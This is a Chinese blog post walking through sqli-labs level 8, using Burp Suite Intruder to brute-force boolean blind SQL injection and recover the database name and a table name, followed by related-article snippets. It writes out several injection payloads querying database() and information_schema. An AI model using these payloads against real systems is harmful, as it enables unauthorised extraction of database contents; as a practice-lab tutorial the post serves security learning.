SQL-labs-Burp(第八关)

最新推荐文章于 2023-05-02 03:00:00 发布
最新推荐文章于 2023-05-02 03:00:00 发布
阅读量1.9k 收藏 18
点赞数 3
文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51706044/article/details/115417743
版权

文章目录

前言

在上篇文章中我们进行sqli-labs第八关时选择的是手注,可见过程是多么繁琐,因此在本文将会演示如何使用Burp作为辅助工具进行爆破

一、数据库长度

注入语句,进行爆破判断

?id=1' and length(database())=8 --+

抓包
在这里插入图片描述
进行爆破
在这里插入图片描述
处理数据
在这里插入图片描述
设置payload
在这里插入图片描述
进行攻击
在这里插入图片描述
判断出数据库的长度为:8

二、数据库名

在这里插入图片描述
代码块:?id=1' and ascii(substr(database(),1,1))=115 --+

抓包在这里插入图片描述
将字符的位置1,和对应ASCII码115设置为测试的数字,攻击类型设置为集束炸弹
在这里插入图片描述
设置payload
我们已经知道了数据库名称的长度为:8,因此
1、第一个参数的设置为1-8
在这里插入图片描述
2、设置第二个参数,数据库名是小写的26个字母,a-z的ASCII码是97-122
在这里插入图片描述
开始攻击
在这里插入图片描述
最后得到8个不一样的长度,正好对应数据库的名称:security

三、爆表名

大致流程与上面的方法是一致的
爆长度

?id=1'   and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=6 --+

在这里插入图片描述
在这里插入图片描述
长度为6
爆表

?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)) =101 --+

在这里插入图片描述
进行爆破
在这里插入图片描述
设置payload
在这里插入图片描述
设置有效载荷量其过程大致与上面差不多,只不过该表名的长度为6
在这里插入图片描述
在这里插入图片描述
爆破成功
在这里插入图片描述
对应ASCII码表,表名为:emails

总结

接下来对表的字段爆破以及字段信息的提取都依据上述的大概流程进行爆破,其实这样爆破虽然省下不少事但同时也要对注入语句进行学习才可以更加熟练。

唤变
关注
  • 3
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
sqli-labs第八(布尔盲注)
qq_42266432的博客
08-19 1261
第八看标题可知此可以使用布尔盲注,布尔盲注我的理解是页面不会回显错误,但是注入等式或不等式时通过页面的反应能判断出注入中算式的true或false 布尔盲注的步骤如下: 获取数据库长度 获取数据库名 获取数据库表 获取表中字段 获取表中数据 先拿获取数据库长度举例 可以看到在length(database())>7时页面正常,length(database())>8时页面异常,即8>7=true,8>8=false,所以数据库名长度为8 再比如获取表名: 同理,sub
SQLi第八,Sqli-labs Less-8,sqlibals less8
最新发布
m0_61408947的博客
04-12 753
如果你也是看准了Python,想自学Python,在这里为大家准备了丰厚的免费。
sqli-labs:第八
J_linnb的博客
05-02 729
使用二分法查找,小于110时不存在,小于120时存在,然后依次查找当猜到115时正常。由于得知数据库结果,根据前几可得知,第四个表是我们想要的,猜解第四个表长度。依次猜解第二个、三个...到第八个字母,最终为'security'猜测是闭了报错,根据正确和错误的回显不同,可以使用布尔盲注。根据之前二分法,得知表名为第一个值为117对应的为'u'猜解到8时正常显示,判断数据库名长度为8。猜解到5正常回显,因此第四个表长度为5。等于115时正常,第一个字母为's'以此类推,最后表名为'users'
sqli-labs靶场第八
gou1791241251的博客
12-26 1682
开始第八,传入id参数看看吧! 第一步:判断注入类型 传入单引号的时候页面显示异常了,说明闭合方式是含有单引号的! 通过使用and 1=1 和and 1=2的状态来判断是否是单引号闭合吧 显然此时是单引号闭合,有布尔类型状态。使用布尔盲注 第二步:判断有多少个字段,使用order by 一共有三个字段 以下便是通过布尔盲注来获取数据库信息的操作了,可以参考sqli-labs第六 ...
【sqli-labs 第八 较详细通解释】
m0_71635484的博客
02-17 874
sqli-labs第八详解
布尔型盲注(sqli第八
NLXHBM的博客
04-20 3273
1.求闭合字符 由此可以判断是单引号闭合字符 2.求当前数据库名的长度 二分法 ?id=1’ and length(database())=8 数据库名的长度为8 3.求当前数据库名对应的ASCII值 ?Id=1’ and ascii(substr(database(),1,1))=115 数据库名第一个字符对应的ASCII值为 115 s 数据库名第二个字符对应的ASCII值为101 e ...
sql-labs通技巧
03-01
在SQL注入领域,`sql-labs` 是一个常用的练习平台,帮助学习者掌握SQL注入技巧。本篇将详细解析如何通过SQL注入攻击不同类型的靶场,以及如何利用自动化工具`sqlmap`进行辅助。 首先,我们需要识别注入点。在`less1...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
适合DVWA和SQL-li-lab的PHPStudy、DVWA、SQL-li-labs
03-26
免费的工具包,下载安装配置好即可使用,给个小赞吧。
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2 3 4 5 4 7 8 9 11 12 13 14 15 16 17 18 19 20 21 22 23 24 的练习内容,可以供给初学sql注入的学者参考
sqli-labs-master第八
FourthGuy的博客
10-09 1600
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码
Sqli-lab教程-史上最全详解(1-22通
qq_52364123的博客
04-10 8388
sql注入集合
sqli-labs 基础篇 第8~10
Lucky小小吴的小屋
01-13 474
sqli-labs 基础篇 第8、9、10
【SQLI-Lab】-Less8
xinyue9966的博客
01-26 338
Less-8 GET - Blind - Boolian Based - Single Quotes (布尔型单引号GET盲注)前言一、GET字符型注入二、步骤总结 前言 一、GET字符型注入 执行数据库查询,并在回显点展示。 用户可以看到数据库查询出错时的错误语句,就可以观察报错语句分析出查询语句结构,从而构造特殊的payload进行注入,并从回显点中获取想要的信息。 二、步骤 和第7题思路过程一样,不过不需要写入、闭合字段后,开始用burp suite爆,具体过程不再细讲。 盲注爆库长度payload
手工和burp两种方式的布尔盲注及Sqli-labs Less 8
信安小菜鸡的博客
04-29 567
布尔盲注 开发人员屏蔽了报错信息,只返回真假的两种情况能够进行布尔盲注 布尔盲注的键点在于将表达式结果与已知值进行对比,根据对比结果判断正确与否 布尔盲注的判断方式 通过长度判断 length():length(database())>=x 通过字符判断 substr():substr(database(),1,1) =‘s’ 通过 ascII 码判断:ascii():ascii(substr(database(),1,1)) =x Sqli-labs Less 8实践 判断数据库名长度 此处采
python编写exp破sqli-labs第8
u013930899的博客
05-22 421
在打sqli-labs卡时,手工用来验证可以,但全部搂出数据有些吃力了,可以使用burp suite或者编写自动化工具进行。 本文是用python编写的自动化工具打第8,详细代码如下。 备注:本文是用docker搭建的sqli-labs,代码中仅作为实现功能的逻辑,并未做符合python代码规范和标准书写。 import requests import string from test.request_s import ascii # ascii码...
sqli labs 8 布尔盲注
Xiaoxiaoqiang_的博客
03-01 179
小学僧
sql-labs安装
08-28
对于安装 SQL-Labs,您可以按照以下步骤进行操作: 1. 首先,您需要确保您的系统上已经安装了 LAMP 或者 WAMP 等 Web 服务器环境,以及 MySQL 数据库。 2. 下载 SQL-Labs 的源代码。您可以从 GitHub 上的项目页面(https://github.com/Audi-1/sqli-labs)下载最新的 ZIP 文件,并将其解压缩到您的 Web 服务器的文档根目录中。 3. 在 MySQL 数据库中创建一个新的数据库,用于存储 SQL-Labs 的数据。您可以使用以下命令在 MySQL 命令行中创建一个新数据库: ``` CREATE DATABASE sqli; ``` 4. 导入 SQL-Labs 的数据库结构。进入到您解压缩的 SQL-Labs 文件夹中,找到 `db-structure.sql` 文件,并使用以下命令导入数据库结构: ``` mysql -u your_username -p sqli < db-structure.sql ``` 替换 `your_username` 为您的 MySQL 用户名,并输入密码进行验证。 5. 配置 SQL-Labs。进入 SQL-Labs 文件夹中的 `db.php` 文件,按照注释中的提示修改数据库连接信息,包括主机名、用户名、密码和数据库名称。 ``` $host = 'localhost'; $user = 'your_username'; $password = 'your_password'; $db = 'sqli'; ``` 6. 启动 Web 服务器,并在浏览器中访问 SQL-Labs。在浏览器中输入 `http://localhost/sql-labs/`,您应该能够看到 SQL-Labs 的登录页面。 现在,您已经成功安装并配置了 SQL-Labs。请确保仔细阅读项目的文档,了解如何正确使用和利用 SQL-Labs 的功能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值